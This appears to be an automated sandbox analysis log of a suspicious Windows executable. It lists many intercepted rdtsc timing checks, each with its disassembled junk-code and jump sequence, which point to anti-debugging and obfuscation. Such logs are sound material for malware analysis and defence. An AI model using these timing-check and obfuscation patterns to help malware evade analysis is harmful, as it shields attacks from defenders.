Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 113433F second address: 1134349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2468994E96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136B5E second address: 1136BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D250Fh], edx 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D1C0Ch], edx 0x00000016 mov dword ptr [ebp+122D1AD9h], ecx 0x0000001c push 108D0E33h 0x00000021 jmp 00007F2468CF6A3Ah 0x00000026 xor dword ptr [esp], 108D0EB3h 0x0000002d push 00000003h 0x0000002f movsx ecx, bx 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 pushad 0x00000036 jng 00007F2468CF6A36h 0x0000003c mov edx, dword ptr [ebp+122D2565h] 0x00000042 popad 0x00000043 je 00007F2468CF6A3Ch 0x00000049 jnc 00007F2468CF6A36h 0x0000004f popad 0x00000050 push 00000003h 0x00000052 mov edi, dword ptr [ebp+122D282Fh] 0x00000058 call 00007F2468CF6A39h 0x0000005d push eax 0x0000005e push edx 0x0000005f jne 00007F2468CF6A3Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136BD2 second address: 1136BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136BF4 second address: 1136BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136BF8 second address: 1136C39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2468994E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jno 00007F2468994E9Ch 0x00000016 jmp 00007F2468994EA4h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 je 00007F2468994E9Ch 0x00000026 jg 00007F2468994E96h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136C39 second address: 1136C7F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007F2468CF6A36h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F2468CF6A44h 0x00000015 pop eax 0x00000016 mov dx, cx 0x00000019 lea ebx, dword ptr [ebp+1244B9CAh] 0x0000001f jmp 00007F2468CF6A3Ch 0x00000024 mov edx, esi 0x00000026 push eax 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a je 00007F2468CF6A36h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136C7F second address: 1136C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136D87 second address: 1136E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 add dword ptr [esp], 768DBE5Ch 0x0000000c js 00007F2468CF6A4Ah 0x00000012 jmp 00007F2468CF6A44h 0x00000017 mov dword ptr [ebp+122D1AD9h], edx 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F2468CF6A38h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 push edi 0x0000003a mov dword ptr [ebp+122D24EEh], ecx 0x00000040 pop ecx 0x00000041 push 00000000h 0x00000043 sub esi, dword ptr [ebp+122D2A33h] 0x00000049 push 00000003h 0x0000004b push esi 0x0000004c mov edx, dword ptr [ebp+122D2A57h] 0x00000052 pop edi 0x00000053 call 00007F2468CF6A39h 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F2468CF6A44h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136E0E second address: 1136E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136E12 second address: 1136E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2468CF6A47h 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F2468CF6A3Ah 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F2468CF6A3Dh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ecx 0x00000023 jnc 00007F2468CF6A3Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136E57 second address: 1136E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a jmp 00007F2468994EA4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2468994EA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1136E8D second address: 1136EC1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D1EA6h], ebx 0x0000000e lea ebx, dword ptr [ebp+1244B9D3h] 0x00000014 mov dword ptr [ebp+122D1AF4h], esi 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2468CF6A47h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1137045 second address: 113704B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 113704B second address: 113704F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 113704F second address: 113705D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 113705D second address: 1137064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1137064 second address: 11370A8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2468994E98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f jnp 00007F2468994E9Ch 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F2468994EA7h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112724B second address: 1127253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155C0D second address: 1155C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155C13 second address: 1155C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155D60 second address: 1155D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155D66 second address: 1155D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2468CF6A3Ch 0x0000000a push edi 0x0000000b jmp 00007F2468CF6A41h 0x00000010 pop edi 0x00000011 push ebx 0x00000012 jmp 00007F2468CF6A3Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155ECE second address: 1155ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155ED3 second address: 1155ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1155ED8 second address: 1155EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F2468994EA8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2468994E9Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 115603B second address: 115605D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2468CF6A36h 0x0000000a jmp 00007F2468CF6A48h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 115633A second address: 1156398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F2468994EA7h 0x0000000d jc 00007F2468994E96h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F2468994EB0h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007F2468994EA8h 0x00000023 jmp 00007F2468994EA6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1156674 second address: 115667C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11568F5 second address: 115691B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F2468994EA7h 0x0000000b pushad 0x0000000c jc 00007F2468994E96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112C36F second address: 112C389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2468CF6A3Bh 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11570DE second address: 11570FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11570FB second address: 1157101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1157101 second address: 1157155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2468994EA9h 0x00000008 js 00007F2468994E96h 0x0000000e jo 00007F2468994E96h 0x00000014 jmp 00007F2468994E9Dh 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jc 00007F2468994E96h 0x00000023 jmp 00007F2468994EA3h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11573EF second address: 11573F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11573F7 second address: 115741B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468994EA3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d jc 00007F2468994EA4h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1157574 second address: 115758E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468CF6A42h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 115758E second address: 11575A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2468994EA2h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11578BF second address: 11578CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F2468CF6A36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11599D2 second address: 11599E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11599E7 second address: 11599ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11599ED second address: 11599F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2468994E96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11599F9 second address: 11599FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11599FF second address: 1159A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1159A09 second address: 1159A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1128D1D second address: 1128D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F2468994EA1h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 115E712 second address: 115E716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 115E90A second address: 115E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1161EAD second address: 1161EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2468CF6A36h 0x0000000a jl 00007F2468CF6A3Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1161EBF second address: 1161ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1161ECA second address: 1161EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2468CF6A36h 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007F2468CF6A36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1162029 second address: 1162036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F2468994E96h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11621B4 second address: 11621C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11621C2 second address: 11621CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11621CB second address: 11621DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F2468CF6A36h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116278B second address: 116278F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116278F second address: 116279C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1164710 second address: 116476B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2468994EA7h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 4872E139h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F2468994E98h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e movsx edi, dx 0x00000031 call 00007F2468994E99h 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pushad 0x0000003a popad 0x0000003b pop edi 0x0000003c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116476B second address: 1164775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2468CF6A36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1164775 second address: 11647D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F2468994E9Eh 0x00000012 ja 00007F2468994E98h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F2468994EA8h 0x00000023 jmp 00007F2468994EA4h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jo 00007F2468994E96h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11647D4 second address: 1164829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F2468CF6A3Fh 0x00000012 push edi 0x00000013 jns 00007F2468CF6A36h 0x00000019 pop edi 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2468CF6A48h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1164829 second address: 116482D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116482D second address: 1164833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1164D00 second address: 1164D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1164FC5 second address: 1164FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11654A5 second address: 11654AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11654AA second address: 11654B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1165716 second address: 1165735 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2468994EA4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116597D second address: 1165981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1165981 second address: 1165987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1165987 second address: 116598B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116598B second address: 116598F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1165A30 second address: 1165A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1165F3D second address: 1165F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11668DD second address: 11668F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2468CF6A38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11668F2 second address: 1166963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F2468994E96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F2468994E98h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 call 00007F2468994E9Eh 0x0000002e mov esi, ebx 0x00000030 pop esi 0x00000031 push 00000000h 0x00000033 jnp 00007F2468994EACh 0x00000039 call 00007F2468994EA2h 0x0000003e movsx esi, si 0x00000041 pop esi 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 pop edi 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jl 00007F2468994E96h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1166963 second address: 1166967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1167AE8 second address: 1167AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1167AFD second address: 1167B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11672AC second address: 11672B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
